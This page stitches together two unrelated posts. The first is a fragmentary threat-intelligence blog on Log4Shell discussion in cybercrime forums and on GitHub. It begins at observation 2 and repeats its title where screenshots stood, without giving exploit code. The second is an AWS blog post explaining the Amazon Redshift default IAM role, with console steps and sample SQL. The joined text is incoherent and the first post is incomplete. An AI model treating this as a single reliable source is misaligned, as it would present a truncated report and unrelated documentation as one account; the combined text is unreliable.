Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

Increased hacker chatter is a key indicator of an emerging threat that security teams must account for. Clearly the spike here is no surprise – however, it is important to monitor and understand the types and scope of the chatter in order to get a clear picture of what’s on the horizon.

2. Hackers – specifically from the Russian, Chinese, and Turkish communities – show interest in the vulnerability and are actively sharing scanners and exploits.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

The following two screenshots show that bad actors have already developed and shared proof of concepts exploiting the vulnerability in Log4j. They also show the extent to which this vulnerability impacts user communities such as PC gamers, social media users, Apple/iCloud customers, and more.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4Shell discussion on a Russian cybercrime forum
Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4j discussion on a Turkish cybercrime forum

3. Code with a proof of concept for the exploit has been published on GitHub.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations

The underground cybercrime community functions like any other business model, but what sets it apart is the spirit with which bad actors share their work for mass consumption. The example above is completely open and free for anyone to access and utilize.

4. Various scanners were published on GitHub to identify vulnerable systems.

Scanners are the cybercriminal’s tool of choice for finding specific vulnerabilities in networks communicating via the internet. Using a scanner, any company — regardless of size — can be a target.

Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4j Scanner Discussion on Reddit
Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
Log4Shell Makes Its Appearance in Hacker Chatter: 4 Observations
A fully automated, accurate, and extensive scanner for finding vulnerable Log4j hosts

While others look inside, we look outside

The bottom line is that threat actors are showing great interest in Log4j within underground communities, and they are leveraging these communities to share information and experience regarding exploiting this vulnerability. That emphasizes the need to quickly patch this vulnerability, before multiple cybercriminals put their hands on an exploit and start to utilize it on a large scale.

Read more about the Log4Shell vulnerability within Log4j, and what your team can do in response.

Use the default IAM role in Amazon Redshift to simplify accessing other AWS services

Post Syndicated from Nita Shah original https://aws.amazon.com/blogs/big-data/use-the-default-iam-role-in-amazon-redshift-to-simplify-accessing-other-aws-services/

Amazon Redshift is a fast, scalable, secure, and fully managed cloud data warehouse that makes it simple and cost-effective to analyze all your data using standard SQL. Amazon Redshift offers up to three times better price performance than any other cloud data warehouse, and can expand to petabyte scale. Today, tens of thousands of AWS customers use Amazon Redshift to run mission-critical business intelligence dashboards, analyze real-time streaming data, and run predictive analytics jobs.

Many features in Amazon Redshift access other services, for example, when loading data from Amazon Simple Storage Service (Amazon S3). This requires you to create an AWS Identity and Access Management (IAM) role and grant that role to the Amazon Redshift cluster. Historically, this has required some degree of expertise to set up access configuration with other AWS services. For details about IAM roles and how to use them, see Create an IAM role for Amazon Redshift.

This post discusses the introduction of the default IAM role, which simplifies the use of other services such as Amazon S3, Amazon SageMaker, AWS Lambda, Amazon Aurora, and AWS Glue by allowing you to create an IAM role from the Amazon Redshift console and assign it as the default IAM role to new or existing Amazon Redshift cluster. The default IAM role simplifies SQL operations that access other AWS services (such as COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL SCHEMA, CREATE MODEL, or CREATE LIBRARY) by eliminating the need to specify the Amazon Resource Name (ARN) for the IAM role.

Overview of solution

The Amazon Redshift SQL commands for COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL TABLE, CREATE EXTERNAL SCHEMA, CREATE MODEL, or CREATE LIBRARY historically require the role ARN to be passed as an argument. Usually, these roles and accesses are set up by admin users. Most data analysts and data engineers using these commands aren’t authorized to view cluster authentication details. To eliminate the need to specify the ARN for the IAM role, Amazon Redshift now provides a new managed IAM policy AmazonRedshiftAllCommandsFullAccess, which has required privileges to use other related services such as Amazon S3, SageMaker, Lambda, Aurora, and AWS Glue. This policy is used for creating the default IAM role via the Amazon Redshift console. End-users can use the default IAM role by specifying IAM_ROLE with the DEFAULT keyword. When you use the Amazon Redshift console to create IAM roles, Amazon Redshift keeps track of all IAM roles created and preselects the most recent default role for all new cluster creations and restores from snapshots.

The Amazon Redshift default IAM role simplifies authentication and authorization with the following benefits:

  • It allows users to run SQL commands without providing the IAM role’s ARN
  • It avoids the need to use multiple AWS Management Console pages to create the Amazon Redshift cluster and IAM role
  • You don’t need to reconfigure default IAM roles every time Amazon Redshift introduces a new feature, which requires additional permission, because Amazon Redshift can modify or extend the AWS managed policy, which is attached to the default IAM role, as required

To demonstrate this, first we create an IAM role through the Amazon Redshift console that has a policy with permissions to run SQL commands such as COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL TABLE, CREATE EXTERNAL SCHEMA, CREATE MODEL, or CREATE LIBRARY. We also demonstrate how to make an existing IAM role the default role, and remove a role as default. Then we show you how to use the default role with various SQL commands, and how to restrict access to the role.

Create a new cluster and set up the IAM default role

The default IAM role is supported in both Amazon Redshift clusters and Amazon Redshift Serverless (preview). To create a new cluster and configure our IAM role as the default role, complete the following steps:

  1. On the Amazon Redshift console, choose Clusters in the navigation pane.

This page lists the clusters in your account in the current Region. A subset of properties of each cluster is also displayed.

  2. Choose Create cluster.
  3. Follow the instructions to enter the properties for cluster configuration.
  4. If you know the required size of your cluster (that is, the node type and number of nodes), choose I’ll choose.
  5. Choose the node type and number of nodes.

If you don’t know how large to size your cluster, choose Help me choose. Doing this starts a sizing calculator that asks you questions about the size and query characteristics of the data that you plan to store in your data warehouse.

  6. Follow the instructions to enter properties for database configurations.
  7. Under Associated IAM roles, on the Manage IAM roles menu, choose Create IAM role.
  8. To specify an S3 bucket for the IAM role to access, choose one of the following methods:
    1. Choose No additional S3 bucket to create the IAM role without specifying specific S3 buckets.
    2. Choose Any S3 bucket to allow users that have access to your Amazon Redshift cluster to also access any S3 bucket and its contents in your AWS account.
    3. Choose Specific S3 buckets to specify one or more S3 buckets that the IAM role being created has permission to access. Then choose one or more S3 buckets from the table.
  9. Choose Create IAM role as default.

Amazon Redshift automatically creates and sets the IAM role as the default for your cluster.

  10. Choose Create cluster to create the cluster.

The cluster might take several minutes to be ready to use. You can verify the new default IAM role under Cluster permissions.

You can only have one IAM role set as the default for the cluster. If you attempt to create another IAM role as the default for the cluster when an existing IAM role is currently assigned as the default, the new IAM role replaces the other IAM role as default.

Make an existing IAM role the default for your new or existing cluster

You can also attach an existing role to the cluster and make it the default IAM role for more granular control of permissions with customized managed policies.

  1. On the Amazon Redshift console, choose Clusters in the navigation pane.
  2. Choose the cluster you want to associate IAM roles with.
  3. Under Associated IAM roles, on the Manage IAM roles menu, choose Associated IAM roles.
  4. Select an IAM role that you want make the default for the cluster.
  5. Choose Associate IAM roles.
  6. Under Associated IAM roles, on the Set default menu, choose Make default.
  7. When prompted, choose Set default to confirm making the specified IAM role the default.
  8. Choose Confirm.

Your IAM role is now listed as default.

Make an IAM role no longer default for your cluster

You can make an IAM role no longer the default role by changing the cluster permissions.

  1. On the Amazon Redshift console, choose Clusters in the navigation pane.
  2. Choose the cluster that you want to associate IAM roles with.
  3. Under Associated IAM roles, select the default IAM role.
  4. On the Set default menu, choose Clear default.
  5. When prompted, choose Clear default to confirm.

Use the default IAM role to run SQL commands

Now we demonstrate how to use the default IAM role in SQL commands like COPY, UNLOAD, CREATE EXTERNAL FUNCTION, CREATE EXTERNAL TABLE, CREATE EXTERNAL SCHEMA, and CREATE MODEL using Amazon Redshift ML.

To run SQL commands, we use Amazon Redshift Query Editor V2, a web-based tool that you can use to explore, analyze, share, and collaborate on data stored on Amazon Redshift. It supports data warehouses on Amazon Redshift and data lakes through Amazon Redshift Spectrum. However, you can use the default IAM role with any tools of your choice.

For additional information, see Introducing Amazon Redshift Query Editor V2, a Free Web-based Query Authoring Tool for Data Analysts.

First verify the cluster is using the default IAM role, as shown in the following screenshot.

Load data from Amazon S3

The SQL in the following screenshot describes how to load data from Amazon S3 using the default IAM role.
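In case the screenshot isn’t available, a representative COPY statement with the default role looks like the following; the table name, bucket, and format options are placeholders rather than the exact statement shown:

COPY public.sample_table
FROM 's3://<your-bucket>/input/'
IAM_ROLE default
FORMAT AS CSV
IGNOREHEADER 1;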

Unload data to Amazon S3

With an Amazon Redshift lake house architecture, you can query data in your data lake and write data back to your data lake in open formats using the UNLOAD command. After the data files are in Amazon S3, you can share the data with other services for further processing.

The SQL in the following screenshot describes how to unload data to Amazon S3 using the default IAM role.
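A representative UNLOAD statement with the default role could look like this; the query, bucket, and output format are placeholders:

UNLOAD ('SELECT * FROM public.sample_table')
TO 's3://<your-bucket>/unload/sample_table_'
IAM_ROLE default
FORMAT AS PARQUET;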

Create an ML model

Redshift ML enables SQL users to create, train, and deploy machine learning (ML) models using familiar SQL commands. The SQL in the following screenshot describes how to build an ML model using the default IAM role. We use the Iris dataset from the UCI Machine Learning Repository.
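Assuming the Iris data has been loaded into a training table such as public.iris_train, a CREATE MODEL statement with the default role could be sketched as follows; the table, function, and bucket names are placeholders:

CREATE MODEL iris_classifier
FROM (SELECT sepal_length, sepal_width, petal_length, petal_width, species
      FROM public.iris_train)
TARGET species
FUNCTION predict_iris_species
IAM_ROLE default
SETTINGS (S3_BUCKET '<your-bucket>');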

Create an external schema and external table

Redshift Spectrum is a feature of Amazon Redshift that allows you to perform SQL queries on data stored in S3 buckets using external schemas and external tables. This eliminates the need to move data from a storage service into the database, and instead queries data directly in an S3 bucket. Redshift Spectrum also expands the scope of a given query because it extends beyond a user’s existing Amazon Redshift data warehouse nodes and into large volumes of unstructured data in S3 data lakes.

The following SQL shows how to use the default IAM role in the CREATE EXTERNAL SCHEMA command. For more information, see Querying external data using Amazon Redshift Spectrum.

Due to security considerations, the default IAM role requires redshift as part of the catalog database name, or resources tagged with the Amazon Redshift service tag. You can customize the policy attached to the default role according to your security requirements. In the following example, we use the AWS Glue Data Catalog name redshift_data.
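A minimal sketch of that example follows; the schema name, external table definition, and S3 location are hypothetical.

    -- Create an external schema backed by the AWS Glue Data Catalog database
    -- redshift_data, using the default IAM role.
    CREATE EXTERNAL SCHEMA IF NOT EXISTS spectrum_schema
    FROM DATA CATALOG
    DATABASE 'redshift_data'
    IAM_ROLE default
    CREATE EXTERNAL DATABASE IF NOT EXISTS;

    -- Create an external table over Parquet files in S3 (placeholder columns and location).
    CREATE EXTERNAL TABLE spectrum_schema.sales (
        sale_id   INT,
        sale_date DATE,
        amount    DECIMAL(10,2)
    )
    STORED AS PARQUET
    LOCATION 's3://example-bucket/spectrum/sales/';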

Restrict access to the default IAM role

To control access privileges of the IAM role that you created and set as the default for your Amazon Redshift cluster, use the ASSUMEROLE privilege. This access control applies to database users and groups when they run commands such as COPY and UNLOAD. After you grant the ASSUMEROLE privilege to a user or group for the IAM role, the user or group can assume that role when running these commands. With the ASSUMEROLE privilege, you can grant access to only the commands that are required.
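For example, the following sketch grants a hypothetical database user the ability to assume the default IAM role only for COPY commands. It assumes the GRANT ASSUMEROLE syntax on your cluster accepts the default keyword; you can also reference the role by its ARN.

    -- Allow the user data_analyst to assume the default IAM role for COPY only.
    GRANT ASSUMEROLE ON default TO data_analyst FOR COPY;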

Best practices

Amazon Redshift uses the AWS security frameworks to implement industry-leading security in the areas of authentication, access control, auditing, logging, compliance, data protection, and network security. For more information, refer to Security in Amazon Redshift and Security best practices in IAM.

Conclusion

This post showed you how the default IAM role simplifies SQL operations that access other AWS services by eliminating the need to specify the ARN for the IAM role. This new functionality helps make Amazon Redshift easier than ever to use, and reduces reliance on an administrator to wrangle these permissions.

As an administrator, you can start using the default IAM role to grant IAM permissions to your Redshift cluster and allow your end users, such as data analysts and developers, to use the default IAM role in their SQL commands without having to provide the ARN for the IAM role.


About the Authors

Nita Shah is an Analytics Specialist Solutions Architect at AWS based out of New York. She has been building data warehouse solutions for over 20 years and specializes in Amazon Redshift. She is focused on helping customers design and build enterprise-scale well-architected analytics and decision support platforms.

Evgenii Rublev is a Software Development Engineer on the AWS Redshift team. He has worked on building end-to-end applications for over 10 years. He is passionate about innovations in building high-availability and high-performance applications to drive a better customer experience. Outside of work, Evgenii enjoys spending time with his family, traveling, and reading books.

Debu Panda, a Principal Product Manager at AWS, is an industry leader in analytics, application platform, and database technologies, and has more than 25 years of experience in the IT world. Debu has published numerous articles on analytics, enterprise Java, and databases and has presented at multiple conferences such as re:Invent, Oracle OpenWorld, and JavaOne. He is the lead author of EJB 3 in Action (Manning Publications 2007, 2014) and Middleware Management (Packt).
